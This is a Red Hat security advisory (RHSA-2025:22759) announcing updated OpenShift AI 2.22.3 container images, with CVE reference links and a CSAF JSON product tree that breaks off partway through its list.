| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64 | — |
Workaround
|
Threats
Impact
Important
References
68 references
| URL | Category |
|---|---|
| https://access.redhat.com/errata/RHSA-2025:22759 | self |
| https://access.redhat.com/security/cve/CVE-2025-12060 | external |
| https://access.redhat.com/security/cve/CVE-2025-47907 | external |
| https://access.redhat.com/security/cve/CVE-2025-53643 | external |
| https://access.redhat.com/security/cve/CVE-2025-58183 | external |
| https://access.redhat.com/security/cve/CVE-2025-58754 | external |
| https://access.redhat.com/security/cve/CVE-2025-62156 | external |
| https://access.redhat.com/security/cve/CVE-2025-62727 | external |
| https://access.redhat.com/security/cve/CVE-2025-9905 | external |
| https://access.redhat.com/security/updates/classi… | external |
| https://docs.redhat.com/en/documentation/red_hat_… | external |
| https://security.access.redhat.com/data/csaf/v2/a… | self |
| https://access.redhat.com/security/cve/CVE-2025-9905 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2396645 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-9905 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-9905 | external |
| https://github.com/keras-team/keras/pull/21602 | external |
| https://github.com/keras-team/keras/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2025-12060 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2407443 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-12060 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-12060 | external |
| https://github.com/keras-team/keras/pull/21760 | external |
| https://github.com/keras-team/keras/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2025-47907 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2387083 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-47907 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-47907 | external |
| https://go.dev/cl/693735 | external |
| https://go.dev/issue/74831 | external |
| https://groups.google.com/g/golang-announce/c/x5M… | external |
| https://pkg.go.dev/vuln/GO-2025-3849 | external |
| https://access.redhat.com/security/cve/CVE-2025-53643 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2380000 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-53643 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-53643 | external |
| https://github.com/aio-libs/aiohttp/commit/e8d774… | external |
| https://github.com/aio-libs/aiohttp/security/advi… | external |
| https://access.redhat.com/security/cve/CVE-2025-58183 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2407258 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58183 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-58183 | external |
| https://go.dev/cl/709861 | external |
| https://go.dev/issue/75677 | external |
| https://groups.google.com/g/golang-announce/c/4Em… | external |
| https://pkg.go.dev/vuln/GO-2025-4014 | external |
| https://access.redhat.com/security/cve/CVE-2025-58754 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2394735 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-58754 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-58754 | external |
| https://github.com/axios/axios/commit/945435fc514… | external |
| https://github.com/axios/axios/pull/7011 | external |
| https://github.com/axios/axios/releases/tag/v1.12.0 | external |
| https://github.com/axios/axios/security/advisorie… | external |
| https://access.redhat.com/security/cve/CVE-2025-62156 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2403800 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-62156 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-62156 | external |
| https://github.com/argoproj/argo-workflows/blob/9… | external |
| https://github.com/argoproj/argo-workflows/commit… | external |
| https://github.com/argoproj/argo-workflows/commit… | external |
| https://github.com/argoproj/argo-workflows/securi… | external |
| https://access.redhat.com/security/cve/CVE-2025-62727 | self |
| https://bugzilla.redhat.com/show_bug.cgi?id=2406929 | external |
| https://www.cve.org/CVERecord?id=CVE-2025-62727 | external |
| https://nvd.nist.gov/vuln/detail/CVE-2025-62727 | external |
| https://github.com/Kludex/starlette/commit/4ea6e2… | external |
| https://github.com/Kludex/starlette/security/advi… | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images are now available for Red Hat OpenShift AI.",
"title": "Topic"
},
{
"category": "general",
"text": "Release of RHOAI 2.22.3 provides these changes:",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:22759",
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-12060",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-47907",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-53643",
"url": "https://access.redhat.com/security/cve/CVE-2025-53643"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58183",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62156",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-62727",
"url": "https://access.redhat.com/security/cve/CVE-2025-62727"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9905",
"url": "https://access.redhat.com/security/cve/CVE-2025-9905"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"url": "https://docs.redhat.com/en/documentation/red_hat_openshift_ai/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_22759.json"
}
],
"title": "Red Hat Security Advisory: RHOAI 2.22.3 - Red Hat OpenShift AI",
"tracking": {
"current_release_date": "2026-05-24T14:51:37+00:00",
"generator": {
"date": "2026-05-24T14:51:37+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2025:22759",
"initial_release_date": "2025-12-04T13:06:08+00:00",
"revision_history": [
{
"date": "2025-12-04T13:06:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-12-04T13:06:21+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-24T14:51:37+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift AI 2.22",
"product": {
"name": "Red Hat OpenShift AI 2.22",
"product_id": "Red Hat OpenShift AI 2.22",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_ai:2.22::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift AI"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_id": "registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-codeflare-operator-rhel9@sha256%3A8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764593039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_id": "registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-dashboard-rhel9@sha256%3A7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764637896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-argoexec-rhel9@sha256%3A86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256%3Ac7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764181290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_id": "registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-data-science-pipelines-operator-controller-rhel9@sha256%3Af27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feast-operator-rhel9@sha256%3A3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763051808"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_id": "registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-feature-server-rhel9@sha256%3Ad5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1763565765"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kf-notebook-controller-rhel9@sha256%3A687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kuberay-operator-controller-rhel9@sha256%3A2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_id": "registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-kueue-controller-rhel9@sha256%3Ab7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764609729"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-api-server-v2-rhel9@sha256%3A854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-driver-rhel9@sha256%3Af092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-launcher-rhel9@sha256%3A46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256%3A3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-runtime-generic-rhel9@sha256%3A65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764293130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_id": "registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256%3A8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594321"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mlmd-grpc-server-rhel9@sha256%3Abfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_id": "registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-mm-rest-proxy-rhel9@sha256%3A974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-controller-rhel9@sha256%3A65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764665999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-operator-rhel9@sha256%3A901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594440"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-model-registry-rhel9@sha256%3Ae0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594496"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-runtime-adapter-rhel9@sha256%3A1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product": {
"name": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_id": "registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odh-modelmesh-serving-controller-rhel9@sha256%3A4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3?arch=amd64\u0026repository_url=registry.redhat.io/rhoai\u0026tag=v2.22.3-1764594518"
}
}
},
{
"category": "product_version",
